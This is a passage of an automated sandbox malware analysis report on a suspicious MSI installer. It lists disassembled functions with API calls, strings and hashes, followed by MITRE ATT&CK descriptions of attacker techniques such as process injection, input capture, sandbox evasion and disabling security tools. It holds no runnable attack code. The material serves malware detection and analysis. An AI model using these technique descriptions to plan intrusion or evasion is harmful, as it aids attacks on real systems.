_malloc.LIBCMT ref: 004120B3

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Strings

Out of memory., xrefs: 004120C9
Hotstring max abbreviation length is 40., xrefs: 00412085

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: Hotstring max abbreviation length is 40.$Out of memory.
API String ID: 501242067-4290233147
Opcode ID: 71a5e63aa3115ddf60435cd705e31d0dad77c05255d714f85426c775479077c9
Instruction ID: d382907889bb48344e10b5a65e50902b12a52632c07aa2ba800ae033923bddb9
Opcode Fuzzy Hash: 71a5e63aa3115ddf60435cd705e31d0dad77c05255d714f85426c775479077c9
Instruction Fuzzy Hash: 62419DB0908301ABD724DF29DD41BAB77A1FB88314F048A6FE549C7390EBB8D851CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004500A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004656D0: __wcsicoll.LIBCMT ref: 004656EC

__ultow.LIBCMT ref: 0045019E

Strings

$%K, xrefs: 004500B2
$%K, xrefs: 0045016B

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __ultow__wcsicoll
String ID: $%K$$%K
API String ID: 1616339823-3342180742
Opcode ID: db83d28dca4082eb7917edc929286074572b0a5bc5fcc0bbb7321902ee5710bf
Instruction ID: a0c5fa78086ec585aff5179cdcf512f35611685f4e69f9368beb1d9c64a7fc7e
Opcode Fuzzy Hash: db83d28dca4082eb7917edc929286074572b0a5bc5fcc0bbb7321902ee5710bf
Instruction Fuzzy Hash: 4E31F73A600A098BCB359E599C4176373A2EF80762F1D0127DD448B387E73AEC49C79B

Uniqueness

Uniqueness Score: -1.00%

Function 0040E330, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E438
FindWindowW.USER32(#32771,00000000), ref: 0040E452

Strings

#32771, xrefs: 0040E441

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: FindWindow_memset
String ID: #32771
API String ID: 860158771-1822717788
Opcode ID: 0ad00cc243baf28dae9946345bacad4592167de6de10ef8993c7112fe9811ee5
Instruction ID: 4c48101437ca8ad3925e7292d5bde36c9c4272a9ac58856e51288acbbcfa3af8
Opcode Fuzzy Hash: 0ad00cc243baf28dae9946345bacad4592167de6de10ef8993c7112fe9811ee5
Instruction Fuzzy Hash: AD416D7155A7C08ED311CF2998A5A927FA1AF35304F8A94FFC0488B373E6789458CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 004492D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 004492E6
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF), ref: 0044935E

Strings

\, xrefs: 00449313

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: InformationVolume_wcsncpy
String ID: \
API String ID: 1349399794-2967466578
Opcode ID: 38ffd3a47113c9a7aa950a203548a3335ea4fb043b442309f50c3b7b22a2ee0f
Instruction ID: f08475ae77bc0296bc929fd392fae12181fba188e552d048e245d04689a4b777
Opcode Fuzzy Hash: 38ffd3a47113c9a7aa950a203548a3335ea4fb043b442309f50c3b7b22a2ee0f
Instruction Fuzzy Hash: AE217C7220830066D330DB54CC81FEBB3D8EBC8710F108B2FF6988A1D0EA759904D399

Uniqueness

Uniqueness Score: -1.00%

Function 00475130, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00475220: __wcsicoll.LIBCMT ref: 004752DA
Part of subcall function 00475220: SetMenuItemInfoW.USER32 ref: 004753DD

SetMenuItemInfoW.USER32 ref: 004751CE
IsMenu.USER32 ref: 004751E7

Strings

0, xrefs: 0047519A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Menu$InfoItem$__wcsicoll
String ID: 0
API String ID: 2393440583-4108050209
Opcode ID: 812088aa6848ec0600135fec4a9622b6d7291087a546a67be3d755675697ae84
Instruction ID: d35cb31129ef47defc5ea29434fa372525e5f9f529d1e2f45d2a24607bf0652c
Opcode Fuzzy Hash: 812088aa6848ec0600135fec4a9622b6d7291087a546a67be3d755675697ae84
Instruction Fuzzy Hash: 982117B4601B019FD7249F15C884BA7B7A4EB84305F44C92EE86E8B351EBB9E844CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0044D2F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0044D31A

Strings

Target label does not exist., xrefs: 0044D330
A Goto/Gosub must not jump into a block that doesn't enclose it., xrefs: 0044D392

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$Target label does not exist.
API String ID: 3832890014-4281464801
Opcode ID: dbc1d6a1a5caf724ae4fa1f9578fe0df14e086752237c02199f3452f6b82f459
Instruction ID: 3e1e43f85582d58e56973ae49981b50939009165a8561cb4f0df72368d1335b2
Opcode Fuzzy Hash: dbc1d6a1a5caf724ae4fa1f9578fe0df14e086752237c02199f3452f6b82f459
Instruction Fuzzy Hash: 74118472F4031557EB20DE26A801BABB394AB91B50F14402FED599B380D778EC51C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0047E2D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 0047E2E4
FileTimeToSystemTime.KERNEL32(?,?), ref: 0047E302

Strings

%04d%02d%02d%02d%02d%02d, xrefs: 0047E330

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %04d%02d%02d%02d%02d%02d
API String ID: 1748579591-4847443
Opcode ID: 7db09129c650ca0392de2c6c1557ce6773cc7d6f9f790c9a0a9e9a1b5daf0e49
Instruction ID: 2d48fb4b280d38107adc8f804eb1401e1d5050083cd6da5a3247545cbe2768b6
Opcode Fuzzy Hash: 7db09129c650ca0392de2c6c1557ce6773cc7d6f9f790c9a0a9e9a1b5daf0e49
Instruction Fuzzy Hash: D50196B15082116AC314DF56DC4597BB7ECAB8DA01F04865EF88982250F67CD844D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0042E1B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 0042E1D0

Strings

Expression too long, xrefs: 0042FBCB
)", xrefs: 0042E1CB

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _wcschr
String ID: )"$Expression too long
API String ID: 2691759472-4196952481
Opcode ID: 89176fb8c3695d618a9a817b2b72ce3549efe74b97761bb6225f544ff0ffdf74
Instruction ID: dcde2d098c913506ec20a3fc7694bf900fca5676d844c71f282239a47027d13a
Opcode Fuzzy Hash: 89176fb8c3695d618a9a817b2b72ce3549efe74b97761bb6225f544ff0ffdf74
Instruction Fuzzy Hash: F9014F70A01219EBCF10DF86D9457BEB3B4FF40716F6080BED81566280D7B91E55DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00433090, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004330A1
__wcsicoll.LIBCMT ref: 004330B8

Strings

wait, xrefs: 0043309B

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: wait
API String ID: 3832890014-2112783333
Opcode ID: 964e9281b00ce43ef995afafa7bbb5c87ed78f3a22be50354fc93c8bd3058479
Instruction ID: 6dd08d71e2e764c1f9b5ab8652b3fe46a2c0b9af5f2774ecac12ad4616eea6d7
Opcode Fuzzy Hash: 964e9281b00ce43ef995afafa7bbb5c87ed78f3a22be50354fc93c8bd3058479
Instruction Fuzzy Hash: 43E0927060460067EB10AB6DDD81F1733ECA70A305F4410ABB809E3292FBACE914C73E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(0000000D), ref: 00401012
IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

<<>>, xrefs: 0040101E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AvailableClipboardFormat
String ID: <<>>
API String ID: 778505046-913080871
Opcode ID: 8c6517f9b533f61741500d6169196b1c8e5082a7402c0f87c3a710bf96d4dfc0
Instruction ID: 68c4d44870cdb3f0bc1b44cbb0f3857e74037eda646ceda61d7f0060a5bd8b1b
Opcode Fuzzy Hash: 8c6517f9b533f61741500d6169196b1c8e5082a7402c0f87c3a710bf96d4dfc0
Instruction Fuzzy Hash: F8E0862070126143EB70B63E7DC0BA62784DB25760B00113FF464E7AE5DB7CDC8116AC

Uniqueness

Uniqueness Score: -1.00%

Function 00405050, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(00000000,00404CC6,?,?,00401033), ref: 0040505F
CloseClipboard.USER32(00404CC6,?,?,00401033), ref: 0040506C

Strings

GlobalLock, xrefs: 0040508E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ClipboardCloseGlobalUnlock
String ID: GlobalLock
API String ID: 3794156920-2848605275
Opcode ID: df53da328c838707879d63bd24ea22cdfdc4718846fdb7de8a84321aa478686f
Instruction ID: bd92ab472ce061f00f052f6e0b802034d769f96baf6bc131ffc073604d2fb094
Opcode Fuzzy Hash: df53da328c838707879d63bd24ea22cdfdc4718846fdb7de8a84321aa478686f
Instruction Fuzzy Hash: 3AE06D30500B02CBE3305F15C45835BB6F0EF91301F64442FA586527E0CBBC5884CE88

Uniqueness

Uniqueness Score: -1.00%

Function 004A9347, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 004A932E

Part of subcall function 0049E7B4: RaiseException.KERNEL32(?,?,00498D05,?,?,?,?,?,00498D05,?,004CE7CC,004D5434,?,00439211,00000010,?), ref: 0049E7F6

std::bad_exception::bad_exception.LIBCMT ref: 004A9356

Part of subcall function 0049E6E9: std::bad_exception::bad_exception.LIBCMT ref: 0049E6F4

Strings

Access violation - no RTTI data!, xrefs: 004A934E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: std::bad_exception::bad_exception$ExceptionException@8RaiseThrow
String ID: Access violation - no RTTI data!
API String ID: 1432139112-2158758863
Opcode ID: a41bcb82ca5c4dd9b9247dc711949159ca1ef4f6cc76e23c6d2ed2abf7d0dcaa
Instruction ID: 433120d9729ceb499e172e159b3056f5e5ac729c44c7128f30802198727d70e1
Opcode Fuzzy Hash: a41bcb82ca5c4dd9b9247dc711949159ca1ef4f6cc76e23c6d2ed2abf7d0dcaa
Instruction Fuzzy Hash: 59E0EC79A012049FCF04DBA5D982B9D77B4AF1A345F2100AAF402E7290E728AD14DB5E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report C003I7GF0S8F920G600203.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "C003I7GF0S8F920G600203.msi"

Indicators

Summary

Streams

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 492

General

Stream Path: \x17163\x16689\x18229\x15870\x18088, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318

General

Stream Path: \x17163\x16689\x18229\x16318\x18483, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318

General

Stream Path: \x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 390304

General

Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18485, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3, Stream Size: 2818

General

